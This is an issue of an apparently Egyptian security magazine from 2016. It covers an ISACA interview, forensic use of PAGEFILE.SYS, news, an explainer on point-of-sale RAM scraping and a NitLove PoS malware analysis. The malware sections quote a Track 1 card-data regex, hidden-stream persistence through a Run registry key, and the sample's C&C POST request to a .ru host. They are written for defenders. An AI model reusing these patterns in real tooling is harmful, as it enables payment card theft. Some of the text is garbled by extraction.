Vol.6 Issue 23 - Jan/Feb 2016
Understanding the POS (Point-of-sale) Malware Interview with
Jonathan Brandt Manager Of Isaca’s Cybersecurity Practices
A Guide to Business Continuity Planning www.bluekaizen.org
www.bluekaizen.org
Contents
Interviews 6 Jonathan Brandt
Grey Hat
10
Virtual Memory Basics: Why Look at PAGEFILE.SYS?
Review A Guide to Business Continuity
30 Planning
Issue 23 | Securitykaizen Magazine | 4
Manager of ISACA’s Cybersecurity Practices
New & News
16 Bluekaizen News
Malware Review
20 Understanding the POS Malware 24 NitLove PoS Malware
Best Practice
35 How to secure your network by using Virtual Desktop Infrastructure
Editor Mohamed H.Abdel Akher Contributors BK team James Atonakos Vijay lalwani Mohamed Elhenawy khaled Alaa Waleed Hamouda
Security Kaizen Magazine Readers Everywhere, Welcome!
Website Development Mariam Samy Marketing Coordinator Mahitab Ahmed Distribution Ahmed Mohamed Design
Medhat A.Albaky Security Kaizen is issued Bi-Monthly Reproduction in Whole or part without written permission is strictly prohibited ALL COPYRIGHTS ARE PRESERVED TO WWW.BLUEKAIZEN.ORG For Advertisement In Security Kaizen Magazine & www.bluekaizen.org Website E-mail info@bluekaizen.org Or Phone: +2 0100 267 5570 +971 5695 40127
2016 will be a year of growth for Securitykaizen magazine as we focus on our commitment to drive most professional articles ranging from professionals to beginners. every issue will have a theme to be more effective in sharing the knowledge, also we will try to cover all sectors through different topics in the cyber security domain.
www.bluekaizen.org
Chairman & Editor-in-Chief Moataz Salah
Editor’s Note
MagazineTeam
The topic this issue is about POS malware which is a malicious software expressly written to steal customer payment data -- especially credit card data -- from retail checkout systems. For more details on how POS attacks are carried out and how to protect against them, see our reviews Fortunately, we have an interview with Jonathan Brandt, Manager of ISACA’s cyber security Practices talking about the new technical course from ISACA named after CSX (Cyber Security Nexuses), He also he also presented security market and how the CSX is going to adapt with the most recent attacks in 2016 . We also outlined some unique articles about the Virtual memory concepts and how is it important in the digital forensics process, we features an important article regarding the business continuity planning and how ISO 22301 and the importance of the digital forensics process natural disasters. Finaly, we’re going to have a CISSP Course on 7th of February, so make sure to book your seat to attend and to have the well-recognized certificate in the cyber security domain. For more information contact us at training@bluekaizen.org
Moving Forward
Mohamed H.Abdel Akher Editor of Security Kaizen Magazine Issue 23 | www.bluekaizen.org | 5
www.bluekaizen.org
Interviews
Interview with
Jonathan Brandt
Manager of ISACA’s Cybersecurity Practices
Can you please introduce yourself to security Kaizen magazine readers (bio, experience, history, etc.) As a cybersecurity practices manager for ISACA, Jonathan Brandt works across the organization as a subject matter expert aiding development of products and offerings that further ISACA’s Cybersecurity Nexus (CSX) portfolio.
BK Team
WWW.Bluekaizen.org Issue 23 | Securitykaizen Magazine | 6
Prior to joining ISACA, Brandt held various cybersecurity leadership roles within the U.S. Department of Defense throughout his 20 years of military service. Areas of professional focus include multi-discipline security, organizational leadership, project management, training and education, and workforce development.
Can you give us an overview about ISACA? What are the activities? What are the benefits for joining ISACA? ISACA (isaca.org) helps global professionals by offering knowledge, standards, training, networking, credentialing and career development. Established in 1969, ISACA is a nonprofit association of 140,000 professionals in 180 countries. Its members include internal and external auditors, CEOs, CFOs, CIOs, educators, information security and control professionals, business managers, students, and IT consultants. ISACA has more than 200 chapters in more than 80 countries.
ISACA’s industry-leading certifications include: • Certified Information Systems Auditor (CISA) • Certified Information Security Manager (CISM) • Certified in the Governance of Enterprise IT (CGEIT) • Certified in Risk and Information Systems Control (CRISC) ISACA offers the Cybersecurity Nexus (CSX), a holistic cybersecurity resource. The CSX program (www.isaca.org/cyber) has many cybersecurity components, including cybersecurity certificate and certifications—Cybersecurity Fundamentals Certificate, CSX Practitioner Certification, CSX Specialist Certification, CSX Expert Certification, and CISM. ISACA also provides and continually updates COBIT, a business framework to govern enterprise technology.
What are the types of memberships exist in ISACA? ISACA offers individual memberships for professionals and students.
Recently, ISACA launched the CSX Certifications and Courses. Can you please give us more details about it? And why ISACA decided to create CSX ? ISACA builds on its 45 years of global leadership in IT to do for cybersecurity professionals what we have done for professionals in IS auditing, control and governance over the past 45 years—and will continue to do. This was a natural evolution for ISACA to serve its 140,000 professionals worldwide. As a global leader in cybersecurity, ISACA provides tools and training to help create a robust global cybersecurity workforce. ISACA launched the Cybersecurity Nexus (CSX) in 2014 to address the cybersecurity skills crisis through resources for every level of a cybersecurity career.
Issue 23 | www.bluekaizen.org | 7
CSX Certifications and Training CSX Practitioner: Demonstrates ability to serve as a first responder to a cybersecurity incident following established procedures and defined processes. CSX Specialist: Demonstrates effective skills and deep knowledge in one or more of the five areas based closely on the NIST Cybersecurity Framework: Identify, Detect, Protect, Respond and Recover. CSX Expert: Demonstrates ability of a master/expert-level cybersecurity professional who can identify, analyze, respond to, and mitigate complex cybersecurity incidents.
Can you give us any numbers, statistics or researches regarding the cyber security professionals shortage internationally? According to ISACA’s 2015 Global Cybersecurity Status Report, 92 percent of respondents whose organizations will be hiring cybersecurity professionals in 2015 say it will be difficult to find skilled candidates. Eighty-three percent believe cyberattacks are a top threat. Yet an alarming 86 percent say there is a global shortage of skilled cybersecurity professionals and only 38 percent feel prepared to fend off a sophisticated attack.
What differentiate CSX from other Cyber Security Courses in the market? The CSX training and skills verification is an adaptive, performance-based cyber lab environment. ISACA is the first to offer PerformanScore, a learning and development tool that measures professionals’ ability to perform cybersecurity tasks based on their problem-solving approach. The tool is unique in its ability to recognize that there are multiple ways to respond to cybersecurity threats and it compares a professional’s actions against an adaptive scoring rubric in real time. This is the first program to combine skills-based training with performance-based exams for certifications, and uses a virtual setting with real-world cybersecurity scenarios.
Issue 23 | Securitykaizen Magazine | 8
How do you see the future of cyber-attacks especially in the Middle East region? How CSX Courses will help employees to be prepared and ready for such attacks? Cyber attacks will continue and increase in frequency globally. Cyber criminals do not take a holiday. Geopolitical conflicts will continue to spill over to cyberspace in the form of ideologically and politically motivated attacks. Significant amounts of technology, both hardware and software, is imported globally to include cyber security tools. For that reason supply chain management is critical in thwarting hidden malwares, backdoors or flaws and other vulnerabilities. However, there is always risk that translates to an urgent need for skills capable of critically inspecting them before deployment—especially in critical infrastructure and critical industry sectors. Also, enterprises should strengthen cyber security with staff that is trained and certified in cyber security. Developing, and maintaining, strong cyber security skills is a critical part of the solution. CSX certifications and training is designed to help professionals build the skills needed at every level of a career in cyber security. The performance-based training and exams prepare professionals for real-world scenarios and the evolution of the ever-changing threat vector.
What was the moral of CSX 2015 North America conference? Do you plan to have it as a yearly conference? The CSX 2015 North America conference was sold out and attendees responded favorably in feedback throughout and after the conference. The CSX conference will be held annually in North America and is expanding globally in 2016.
In 2016, do you expect higher investments in cyber security workforce? According to a survey by ISACA and RSA Conference, State of Cybersecurity: Implications for 2015, 56 percent of organizations responded they will spend more on cybersecurity in 2015, and 63 percent say their executive team provides appropriate funding.
Finally, what is your advice for governments, users and organizations to stay secure? It is uncommon for an organization to not have a security awareness program. The question is, is the security awareness program effective? 360-degree evaluations can be a useful tool to glean data about your security climate and make adjustments. As threat environments evolve, so too should your security needs. The cybersecurity market is inundated with solutions that often carry expensive price tags. Cybersecurity should be infused into all facets of business and when a solution has exceeded its usefulness, you cannot be afraid to move on. Lastly, it is critical to stop treating cybersecurity differently. It is technological risk and requires daily hygiene, similar to information, physical and operational security. Many would never leave sensitive information (e.g, salary data) in a common area, leave their doors unlocked at night or freely give out keys to their home. Yet, these are the exact things—in a digital world—that attribute to many incidents.
Issue 23 | www.bluekaizen.org | 9
www.bluekaizen.org
Grey Hat
Virtual Memory Basics:
Why Look at PAGEFILE.SYS? Introduction Memory, or storage, is essential to the operation of a computer. There are different kinds of memory as well, separated into two categories: • Primary Storage: This is short-term, high-speed, low-capacity memory. Motherboard RAM and the different types of cache contained inside and outside the CPU are used here to store instructions and data.
James Atonakos Forensic Investigator at WhiteHat Forensics
Issue 23 | Securitykaizen Magazine | 10
• Secondary Storage: This is long-term, low-speed, high-capacity storage. Hard disk, CD, and DVD media fall into this category. Figure 1 illustrates the flow of instructions and data in a computer. For the CPU to execute a program, the instructions and data that make up the program must be copied from the hard disk into RAM. The CPU only fetches instructions and data from RAM (or cache), never directly from the hard disk.
Once a program (or a portion of it) has been copied into RAM, the CPU will begin fetching instructions and data from the memory locations the program was copied into. The CPU will always look inside its internal cache first, to see if the instruction or data it needs is stored there. A cache hit means the instruction or data has been found in the cache. A cache miss means the instruction or data is not stored in the cache. If there is a miss in the internal cache, the CPU then looks in the external cache. A miss there means the CPU has to load the instruction or data from RAM. This takes the longest amount of access time, because the cache access time is a lot shorter than the access time of RAM due to its internal architecture.
To a human being, it appears that all programs are running simultaneously, even though that is impossible with a single CPU. However, simultaneous execution is possible when the single CPU has multiple cores, or there are multiple CPUs in the system. Then you have the case where two or more programs really can run at the same time, each on its own CPU or core. With multiple processes running, the RAM allocated to each program will add up and possibly exceed the amount of physical RAM installed on the system. For example, there is 2 GB of RAM, but the number of programs running require 2.4 GB of RAM. Where does the extra 400 MB of RAM come from? The system “borrows” it from the hard disk. This is the essence of virtual memory. The total amount of memory available to the operating system for running programs equals the amount of RAM plus the amount of “paging” storage available on the hard disk. Demand-Paging Virtual Memory Operating systems utilize a demand-paging virtual memory system in order to make efficient use of RAM and support concurrent execution of multiple programs in RAM at the same time. In a paged memory management system, RAM is divided into fixed-size blocks, typically 4 KB in size, called pages. One or more pages is allocated to a program when it is copied into RAM for execution. Note that the entire program does not have to be copied into RAM for it to begin execution. The reason for this will be explained shortly.
Figure 1: The flow of instructions and data in a computer Data from RAM is then also written into the cache during a miss so that future accesses to the same data will result in hits and better memory performance. Modern operating systems, such as Windows and Linux, support multitasking. This allows multiple programs to run concurrently (but not simultaneously) on one CPU. Concurrent execution of multiple programs means that, over a period of time, all programs have experienced execution time on the CPU. This is accomplished by running one program for a short period of time (called a time slice), then saving all CPU registers, reloading the CPU registers for the next program that will run, and resuming execution of the next program. This way, each program that is “running” gets multiple slices of time every second to execute.
The pages allocated to a program do not have to all be in the same area of RAM. Much like file fragmentation on a disk, program pages may be fragmented as well, and spread out across the RAM memory space. Special registers and tables in the protected-mode architecture of the Intel 80x86 CPU contain pointers to allocated pages so that they may be properly accessed when the CPU is fetching an instruction or data from the required page. Now, consider a program that provides a menu of options when it starts up. Once a user selects a particular menu option, a different section of the program code is executed. This is an example of why it is not necessary to load the entire program into memory at the beginning of its execution. Perhaps only the portion of the program that contains the menu code is loaded into one or more pages. Then, when a user chooses an option, the pages for the program Issue 23 | www.bluekaizen.org | 11
code that implement that option are loaded. Protected mode provides a way of determining if the instruction or data being fetched by the CPU is present in a page or not. If it is not present, a page fault is generated that causes the operating system to load the necessary program code into a new page. This of course results in a small loss of performance, as the CPU must now wait until the information has been transferred from the hard disk into a RAM page. The benefit here is that a page is not loaded into RAM until it is needed. This is the essence of demand paging. When there is a demand for the page, it is allocated and loaded. But if we just continue allocating and loading pages into RAM, eventually we will run out of free pages. When this happens, we can not have the computer grind to a halt, or give an error because there is not enough RAM to start a program or continue execution of a program. Instead, when a page fault occurs and there are no free pages, a victim page must be chosen to be overwritten by new information from the hard disk. Ideally, a victim page that is never needed again is chosen, but this is not a requirement.
Figure 2(a): Initial state of RAM with multiple processes running In Figure 2(b), pages A4, E1, and E2 have been loaded into RAM. There are now no free pages in RAM left to allocate.
The victim page may need to be written back to the hard disk before it RAM page is overwritten with new data. The protected mode architecture keeps track of the status of each page and knows if a page is “dirty,� meaning that it has been modified since being loaded into RAM. A dirty page must be written back to the hard disk. If the page is not dirty, it can just be overwritten with new data. Let us take a visual look at this process. Figure 2(a) shows a number of running processes (another term for program) already having pages loaded into RAM. There are a few free pages in RAM still remaining to be allocated as needed. The operating system has not had to use PAGEFILE.SYS yet. PAGEFILE. SYS is the portion of hard disk storage allocated for storage of dirty pages in a Windows environment.
Figure 2(b): New pages have been loaded into RAM In Figure 2(c) page B3 needs to come into RAM, but since there are no free pages available, a victim page must be chosen. The page replacement algorithm chooses page A1 as the victim page. A page replacement algorithm is responsible for keeping track of allocated RAM pages and choosing a victim based on a predetermined metric, such as how long a page has been resident in RAM, how many times it has been accessed, or how long it has been since its last access.
Issue 23 | Securitykaizen Magazine | 12
The operating system determines that page A1 is dirty and must be written back to disk, so it is written to PAGEFILE.SYS.
Figure 2(e): Another victim page must be chosen This allows page C4 to be loaded into RAM, as shown in Figure 2(f). Figure 2(c): A victim page needs to be chosen Once page A1 has been freed up, page B3 can be loaded into RAM, as shown in Figure 2(d).
Figure 2(f): Another new page is loaded into RAM Figure 2(d): A new page is loaded into RAM In Figure 2(e) page C4 needs to be loaded into RAM, but there are still no free pages, and page D1 is chosen as a victim and, also being dirty, is written back to PAGEFILE.SYS.
As this paging scenario continues to play out, processes keep needing new pages loaded into RAM, victims continue being swapped back to PAGEFILE.SYS, and after a while we see the state of the system as shown in Figure 2(g).
Issue 23 | www.bluekaizen.org | 13
Figure 2(g): RAM contents and PAGEFILE.SYS contents after multiple page swaps It is these “dirty� pages stored in PAGEFILE.SYS that are potential sources of good forensic evidence during an investigation. PAGEFILE.SYS is a protected and hidden operating system file, but is easily accessible to forensic software. The size of PAGEFILE.SYS is typically at least as large as the amount of motherboard RAM. Figure 3(a) shows the current size of the paging file. This can be made larger or smaller by the user by clicking the Change button, which brings up the Virtual Memory paging file size adjustment window, shown in Figure 3(b).
Figure 3(b): Virtual Memory paging file size window In terms of performance, the larger the page file the better, and the more RAM the better. If there is not enough RAM to adequately support the number of running processes, the operating system can get into a low-performance state called thrashing, where there are almost continuous page faults, plenty of swapping going on, but not much execution of processes as so much time is being devoted to swapping. PAGEFILE.SYS Solves the Case ! So, why does a forensic investigator need to care about PAGEFILE.SYS? Here is an actual example of a forensic investigation in a case that was solved by evidence located in PAGEFILE.SYS. The main goal of the case was to determine if a computer accessed a particular file over the network. The forensic investigation did not show any references to the file in the command line history, or in recent documents, or in deleted files, nor was the file stored anywhere on the disk partition.
Figure 3(a): Advanced tab in Performance Options shows the Virtual memory paging file size
Issue 23 | Securitykaizen Magazine | 14
The PAGEFILE.SYS file was processed by a strings program to extract all printable character strings. When the output file was searched, a network path to the
file being searched for was present. This means that the same file path was once resident in a RAM page, and that RAM page was chosen as a victim and written back to PAGEFILE.SYS. If the file path was resident in a RAM page, that indicates the file was accessed in some way by the system, which is the proof being sought in the investigation. Conclusion The evidentiary value of PAGEFILE.SYS has hopefully been demonstrated here. In the same fashion, the Windows HIBERFIL.SYS file can also be a forensic gold mine, as it contains a complete copy of RAM contents at the time a computer was put into hibernation. For Linux investigations, the equivalent to PAGEFILE.SYS is the swap file, where RAM pages are stored when they are replaced. The more a forensic investigator understands about the details of how an operating system functions the better. Knowing the details of how virtual memory is implemented gives the investigator another source of possible evidence that may be important to a case.
w w w . b l u e k a i z e n . o r g
Get your printed copy of the magazine at your Place by applying for the gold membership , for more information contact at member@bluekaizen.Org
to send us an article please email editing@bluekaizen.org
Issue 23 | www.bluekaizen.org | 15
www.bluekaizen.org
New & News
News A peek under the hood to the recent security breaches
The End of bulk telephony metadata program
The midnight of November 29th, the NSA stopped its bulk collection of telephony metadata once authorized under Section 215 of the USA Patriot Act. Under the USA Freedom Act, two and a half years after Edward Snowden’s revelations No longer will the NSA rely on the Patriot Act’s Section 215 to collect all phone records. Instead it will have to contact telecommunications companies holding the data for them.
BK Team
WWW.Bluekaizen.org
Issue 23 | Securitykaizen Magazine | 16
Windows’ Nemesis: Pre-boot malware targeting payment card A financially motivated threat group targeting payment card data using sophisticated malware that executes before the operating system boots. This rarely seen technique, referred to as a ‘bootkit’, infects lowerlevel system components making it very difficult to identify and detect. The malware’s installation location also means it will persist even after re-installing the operating system, widely considered the most effective way to eradicate malware. As result, incident responders will need tools that can access and search raw disks at scale for evidence of bootkits.” The Nemesis malware platform features backdoors that support a variety of network protocols and communication channels for command and control. The cybercrime tools supports file transfer, screen capture, keystroke logging, process injection, process manipulation, and task scheduling.
Report: Scripting languages most vulnerable, Cross-site scripting was the most common vulnerability According to an analysis of over 200,000 applications, PHP is the programming language with the most vulnerabilities, The report, by Boston-based security firm Veracode, was released this morning and is based on Veracode’s assessment of more than a trillion lines of code for customers at large and small companies, commercial software suppliers, and open source projects. Overall, scripting languages like PHP had a much higher incidence of vulnerabilities than Java or .NET, said Chris Wysopal, Veracode’s CTO and CISO.”If you have a choice, don’t pick a language like PHP,” he said. “Unfortunately, developers aren’t picking languages based on how secure they are.” The reports also showed that SQLi and XSS are among the Open Web Application Security Project’s (OWASP) Top 10 most critical web application security risks.
Issue 23 | www.bluekaizen.org | 17
Censys, The new search engine for hackers
Censys is a free search engine that was originally released in October by researchers from the University of Michigan, it is currently powered by Google. A new Search Engine like Shodan for devices exposed on the Internet, it could be used by experts to assess the security they implement. “We have found everything from ATMs and bank safes to industrial control systems for power plants. It’s kind of scary,” said Zakir Durumeric, the researcher leading the Censys project at the University of Michigan John Matherly, founder and CEO of Shodan, says he doesn’t think his coverage is much different, and notes that Shodan currently probes IP addresses in a wider variety of ways than Censys, for example looking specifically for certain types of control system. More details, you would have a look on their research paper https://jhalderm.com/pub/papers/censys-ccs15.pdf
Issue 23 | Securitykaizen Magazine | 18
Bluekaizen Gold Membership Program was first released in November 2012 at Cairo Security Camp 2012. The target of the membership was to provide high quality services to our members in cyber security domain through different channels such as (books, magazine, events, Courses and others.). BY 2016, we hope to improve the program more and provide more services to our members. Please fill our survey in order to serve you better and better .
https://goo.gl/MvcEJB
Contact US : member@bluekaizen.org Egypt : +2 010 2085 4994 Dubai : +971 0503047401
www.bluekaizen.org
Reviews
Malware Review
Understanding the POS (Point-of-sale) Malware
Vijay lalwani
Security Analyst at Paladion Network Issue 23 | Securitykaizen Magazine | 20
POS (Point-of-sale) Malware and payment card data breaches Payment card data breaches have become an everyday crime. Today’s attackers are using Point of Sale (POS) malware (different families of POS malware) to steal data from POS systems. Industries that use POS devices are the obvious a target or victims of these attacks. Hospitality and retail companies are the top targets, hardly surprising as that’s where most POS devices are used. But other sectors, such as healthcare, also process payments and are also at risk.
What is POS Malware and how does it steal payment card data? POS malware (RAM Scraper) is a memory-scraping tool that grabs card data stored temporarily in the RAM of a POS system during transactions at point-of-sale terminals, and stores it on the victim’s own system for later retrieval.
How POS RAM Scraping works POS RAM Scraper basically uses the regular expression (regex) to search and gather (i.e. to parse) Tracks 1 and 2 credit card data from the process memory space in RAM. The following is an example to parse Track1 data: ^%([A-Z])([0-9]{1,19})\^([^\^]{2,26})\^([0-9]{4}|\^)([0-9] {3}|\^)([^\?]+)\?$
The payment card industry has a set of data security standards to ensure that all companies that process, store, or transmit credit card information maintain a secure environment known as PCI-DSS (Payment Card Industry Data Security Standard). These standards require end-to-end encryption of sensitive payment data when it is transmitted, received or stored.
The regex may gather some garbage value from the process memory space of RAM depending on its accuracy. To avoid garbage value parsed by regex, some POS RAM scrapers implement Luhn validation to check the card data gathered.
This payment data is decrypted in the POS’s RAM for processing, and the RAM is where the scraper strikes. For the PCI DSS requirements and overview visit here.
When the credit card is swiped in the POS system, the data stored on the card is copied into the POS software’s process memory space in the RAM temporary for authentication and processing for transaction of payment.
Point-of-sale
(POS)
POS RAM Scraping Payment card data structure: The magnetic stripe on the back of a payment card has three data tracks, but only tracks 1 and 2 are used as defined by the International Organization for Standardization (ISO)/ International Electro Technical Commission (IEC) 7813
malware
PAN and Luhn: The data track of payment cards’ content PAN (Primary Account Number) is anywhere between 16 and 19 digits long and has the following format: MIII-IIAA-AAAA-AAAC The first six digits are known as the “Issuer Identification Number” (IIN). Its first digit is called the “Major Industry Identifier” (MII). Major card networks— Visa, MasterCard, Discover, JCB®, AMEX, and others—all have unique IIN ranges that identify which institution issued a card. A: Account number can be up to 12 digits, C: Check digit calculate using the Luhn algorithm. All the valid credit card numbers must pass this Luhn validation check.
Here is where the POS RAM Scrapers starts its work: It retrieves the list of processes that are running on the POS system and searches each process memory for card data. It searches each and every process’ memory and retrieves Tracks 1 and 2 card data as per the regex.
POS RAM Scrapers Variants: The earlier variants of POS RAM Scrapers only included the following basic functions:• Install a malware as a service • Scan POS system process’s RAM for credit card Track 1 and Track two data • Dump the results into a text file • The text file was then probably accessed remotely or manually
Issue 23 | www.bluekaizen.org | 21
As the time passes, the POS RAM Scraper is targeting more large organizations and has the capability of performing the following functions:• Networking functions (for exfiltration of stolen card data to remote server using HTTP, FTP, Tor, etc.) • Encryption (encrypt the stolen card data before exfiltrating) • BOT and Kill Switch operation (can receive the commands from C&C server including commands for uninstalling the malware) • Multiple exfiltration techniques Challenges for the attacker: The big challenge for attackers in successfully gathering the data is to infect the POS system with POS malware. There are many techniques that can be used by the attackers to infect the POS system: • Insider jobs • Spamming or Phishing • Social engineering • Lateral movement from existing infections • Vulnerability exploitation • Abusing PCI DSS noncompliance • And many other techniques to infect POS systems Infecting POS Systems: Today, many organizations using POS systems have branches in different geographic locations. In these situations, organizations have POS management servers which manage all POS systems present at different geographic locations.
Issue 23 | Securitykaizen Magazine | 22
The main aim of attackers is to compromise this management server from where it can infect all the POS systems at different geographic locations. The attackers can compromise this server by understanding the organization’s network structures, finding the weakness and gaining access to networks by using the weakness. This can be done by using the above mentioned techniques for infecting POS systems. After gaining access to the network, attackers establish the communication with the C&C server and will perform the reconnaissance on the organization’s network and collect the information that will help them compromise the POS management server. Once they succeed in compromising the POS management server, they start infecting the POS systems managed by this server. Attackers will also set backdoors so that a command for removing the malware from POS systems can be issued by C&C server for removing all the traces of the infection. Prevention steps: Restrict remote access: Limit remote access into POS systems by third-party companies. Enforce strong password policies: PCI Compliance Report says that over 25% of companies still use factory defaults. Reserve POS systems for POS activities: Do not allow staff to use them to browse the web, check email, or play games. Use two-factor authentication: Stronger passwords would reduce the problem, but two-factor authentication would be better.
www.bluekaizen.org
Reviews
Malware Review
NitLove PoS Malware Executive Summary This is an analysis of a packed executable malware, by analysis it was identified as NitLove PoS. Malware analysis team performed behavioral and code analysis of this sample. This malware is a packed executable. This malware is a Trojan that targets the PoS systems, it keeps itself hidden in the system and steal credit card information. This malware is targeting credit card track 1 and track 2 data at the RAM of PoS systems. The payment card industry has a set of data security standards known as PCI-DSS. These standards require end-to-end encryption of sensitive payment data when it is transmitted, received or stored.
Mohamed Elhenawy Senior Malware Analyst at Eg-CERT
Issue 23 | Securitykaizen Magazine | 24
This payment data is decrypted in the PoS’s RAM for processing, and the RAM is where the malware strikes. It harvests the clear-text payment data and send that information to
Malware flow chart
Identification:
1 Packed File Information
Packed File Identification File name
NitLove.exe
File Size
252 KB (258,560 bytes)
MD5
b3962f61a4819593233aa5893421c4d1
SHA1
1deb651f9cded42d32b9167167a091ff88bff75e
SHA256
2a1f5a04025b7837d187ed8e9aaab7b5fff607327866e9bc9e5da83a84b56dda
Type
Trojan
Packers
Custom
Type of file
Application “Win32 EXE”
File Format
Portable Executable (32 bit)
2 Packing detection
Issue 23 | www.bluekaizen.org | 25
Behavior analysis 1. Process Activity: Starting new process “wscript “C:\Users\Test\AppData\ Local\Temp:defrag.vbs”” 2. File Activity: Creating tow hidden files via alternative data stream C:\Users\Test\AppData\Local\Temp:defrag.vbs C:\Users\Test\AppData\Local\Temp:defrag.scr Deleting itself 3. Registry Activity: Adding a new key in the Run registry with name “Defrag” and value “wscript “C:\Users\Test\AppData\ Local\Temp:defrag.vbs”” 4. Network Activity: No network Activity Code analysis As mentioned the packing algorithm of this malware is a custom one, so there isn’t an automated tool to unpack it and it must be unpacked manually After traversing the code, we reached to the instruction where it will go to the malware code
At the start of the unpacked code, malware searched for certain sequence of bytes in its code. After finding this sequence malware got a length and data of encoded function which copied and decoded in the stack then called by malware
Issue 23 | Securitykaizen Magazine | 26
This called function is used to get addresses of some APIs which used to get information about system and read data from certain resource, this data is used with some data from the malware itself to generate a new function. Note: one of pieces of the information retrieved is the flag of BeingDebudded which consider as antidebugging technique and must be handled during analysis
After that the malware got addresses of some APIs then modified part of code then jumps to this part Note: as a custom packing algorithm we can’t determine exactly the OEP, so the address where the code jump could be considered as the OEP.7
After jumping to the new code the malware created visual basic script file and used “wscript.exe” utility to run it at startup vie “Run” registry. It creates this file hidden in the Temp path via alternative data stream “C:\Users\Test\AppData\Local\Temp:defrag.vbs”. Malware added new registry key with name “Defrag” and value “wscript “C:\Users\Test\AppData\Local\ Temp:defrag.vbs””
After preparing the registry key, the malware got the command line and its argument then check the number of arguments. If it was only one argument which is the command of the malware itself, then it will copy itself in a hidden scr file in the Temp path “C:\ Users\Test\AppData\Local\Temp:defrag.scr” and run this copied file with itself as an argument. As a result for running the new file without “-“ argument it will delete the original file then run the vbs file which will run the new scr file in a proper way. After running this new process the malware terminate itself but we didn’t see any malicious activity till now. By analyzing the new created process “defrag.scr” we found that it act the same as the original malware but we noticed that it checks if there is an argument “-“ When we analyzed it with the argument “-“, it started to do its malicious activities and that was noticed in the vbs file that it started the process with “-“ argument
After the prober running for malware, it read the MachineGuid from the registry “Software\Microsoft\ Cryptography” then it started three threads for its malicious action
1st thread is responsible for connection with C&C. It received the MachineGuid as a parameter.
Issue 23 | www.bluekaizen.org | 27
The malware read the computer name and product name and used them with a hardcoded string to create a new string which will be used in connection with C&C.
POST /derpos/gateway.php HTTP/1.1 User-Agent: nit_love95859283-fafd-4e5a-9fb0b98c5bbb59f2 Host: systeminfou48.ru
Then it concatenated the MachineGuid with its name “nit_love” to use it as a user agent, after that it initialized connection with the domain “systeminfou48.ru” on port 443. The malware sent a post request to the page “derpos/ gateway.php” which contains the previously generated string (computer name and product name string)
262E034FHWAWAWAWA <WIN-CI5PMPV3JV8> <Windows 7 Enterprise> This is a simple view for the connection while the value at the beginning of sent data is a calculated value depending on the machine information. Unfortunately, the C&C was down so we can’t get more information and the thread still looping waiting for connection with C&C. 2nd thread is responsible for inter-process communication. It creates a mailslot which used by threads for communication. The malware created mailslot with name “\\.\mailsl ot\95d292040d8c4e31ac54a93ace198142” and start listening on it for collected data from 3rd thread. Once data received, it sent to C&C the same way the machine information sent The same as 1st thread, this thread still looping waiting for incoming messages.
Issue 23 | Securitykaizen Magazine | 28
3rd thread is the one which responsible for scraping memory and searching for credit and debit cards information and sending it to the 2nd thread via mailslot. The malware started this thread by reading system information to get all running processes on the system, then it excluded system processes.
The newly created thread read the contents of the segment and search them for signature of credit card or debit card information. The signature is the Track 1 and Track 2 data which is a standard format for credit and debit cards.
For non-system processes, malware filtered them by custom hash calculator to exclude the well-known processes like iexplorer, firefox, ...etc This is a pseudo code for hash calculator x=0 For i in process_name i=lower case(i) x=x+i i=i*128 x=x xor i and the final result of x is the calculated hash. For the rest of processes, the thread opened them one by one and check to ensure that itâ&#x20AC;&#x2122;s not its own process then retrieved information about its memory segments and searched for segments with state MEM-COMMIT and protect PAGE_READWRITE.
For every segment with these specs, its contents are read and a new tread created to work on its contents.
Issue 23 | www.bluekaizen.org | 29
www.bluekaizen.org
Reviews
A Guide to Business Continuity Planning
Khaled Alaa
Information Security Engineer at Raya Data Center
Issue 23 | Securitykaizen Magazine | 30
Purpose Disasters can strike any time. These range from large-scale natural catastrophes and acts of terror to technology-related accidents and environmental incidents. The causes of hazards may be different â&#x20AC;&#x201C; whether human negligence, malevolence or natural disasters but their likelihood (and seriousness) is no less real. The purpose of this document is to give an overview of what is Business Continuity Planning and provide some guidance and resources for beginner.
General Information This International Standard specifies requirements for setting up and managing an effective Business Continuity Management System (BCMS). A BCMS emphasizes the importance of
Business continuity contributes to a more resilient society. The wider community and the impact of the organization’s environment on the organization and therefore other organizations may need to be involved in the recovery process.
• Understanding the organization’s needs and the necessity for establishing business continuity management policy and objectives, • implementing and operating controls and measures for managing an organization’s overall capability to manage disruptive incidents, • Monitoring and reviewing the performance and effectiveness of the BCMS, and • Continual improvement measurement.
based
on
The Plan-Do-Check-Act(PDCA) Model
objective
A BCMS, like any other management system, has the following key components: a- a policy; b- people with defined responsibilities; c- management processes relating to 1. policy, 2. planning, 3. implementation and operation, 4. performance assessment, 5. management review, and 6. improvement; d- documentation providing auditable evidence; and e- any business continuity management processes relevant to the organization.
Plan (Establish)
Establish business continuity policy, objectives, targets, controls, processes and procedures relevant to improving business continuity in order to deliver results that align with the organization’s overall policies and objectives.
Do (Implement and operate)
Implement and operate the business continuity policy, controls, processes and procedures.
Check (Monitor and review)
Monitor and review performance against business continuity policy and objectives, report the results to management for review, and determine and authorize actions for remediation and improvement.
Act (Maintain and improve)
Maintain and improve the BCMS by taking corrective action, based on the results of management review and reappraising the scope of the BCMS and business continuity policy and objectives.
Issue 23 | www.bluekaizen.org | 31
What Is Business Continuity Planning Business Continuity refers to the activities required to keep your organization running during a period of displacement or interruption of normal operation. Whereas, Disaster Recovery is the process of rebuilding your operation or infrastructure after the disaster has passed.
How ISO 22301 Helps
Business Continuity Issue
According to Business Continuity Institute’s Glossary2:
“Business continuity plan is a collection of procedures and information which is developed, compiled and maintained in readiness for use in the event of an emergency or disaster.”
Business disruption, impacting delivery of products or services to customers
When We Need Business Continuity Plan? We need Business Continuity Plan when there is a disruption to our business such as disaster. The Business Continuity Plan should cover the occurrence of following events: a) Equipment failure (such as disk crash).
Reputation Damage
b) Disruption of power supply or telecommunication. c) Application failure or corruption of database. d) Human error, sabotage or strike. e) Malicious Software (Viruses, Worms, Trojan horses) attack. f) Hacking or other Internet attacks. g) Social unrest or terrorist attacks.
Insufficient understanding of threats to BC
h) Fire i) Natural disasters (Flood, Earthquake, Hurricanes) Who Should Participate in Business Continuity Planning? Normally Business Continuity Coordinator or Disaster Recovery Coordinator will responsible for maintaining Business Continuity Plan. However his or her job is not updating the Plan himself or herself alone. His or Her job is to carry out review periodically by distribute relevant parts of the Plan to the owner of the documents and ensure the documents are updated.
Issue 23 | Securitykaizen Magazine | 32
Lack of management commitment
How ISO Helps
Benefits
